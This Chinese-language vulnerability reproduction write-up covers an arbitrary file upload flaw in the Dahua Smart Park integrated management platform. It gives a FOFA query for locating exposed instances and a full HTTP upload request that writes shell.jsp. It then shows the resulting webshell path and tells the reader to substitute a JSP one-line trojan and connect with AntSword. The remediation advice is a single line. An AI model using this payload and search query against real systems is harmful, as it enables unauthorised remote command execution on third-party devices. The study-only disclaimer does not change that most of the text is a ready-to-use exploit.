声明:文章仅供安全研究与学习之用,请勿用于非法用途!
一、简介
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
二、漏洞介绍
大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
三、漏洞复现
1、fofa语句:app="dahua-智慧园区综合管理平台"
进入登陆界面如下:
2、验证是否存在漏洞
在IP地址后加上/emap/devicePoint_addImgIco?hasSubsystem=true,出现如图证明存在漏洞
3、payload使用
打开Burp Suite,把payload复制进去,把地址改成自己要测试的地址和端口,然后重发一下,就会得到上传的jsp一句话名称,如图
payload:
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: multipart/form-data; boundary=---------------------------23866052015499226143339905740
Content-Length: 1176
-----------------------------23866052015499226143339905740
Content-Disposition: form-data; name="upload"; filename="shell.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
111111
-----------------------------23866052015499226143339905740--
4、漏洞可用性验证
4.1、验证url,看看是否被解析
http://IP:端口/upload/emap/society_new/ico_res_**********.jsp
4.2、把上述payload里面的111111替换成jsp一句话木马,蚁剑连接测试
四、修复建议
建议使用相关系统的用户在尽快打补丁的同时,做好访问来源的限制,尽量避免大华智慧园区综合管理平台暴露在公网或不安全的网络环境中。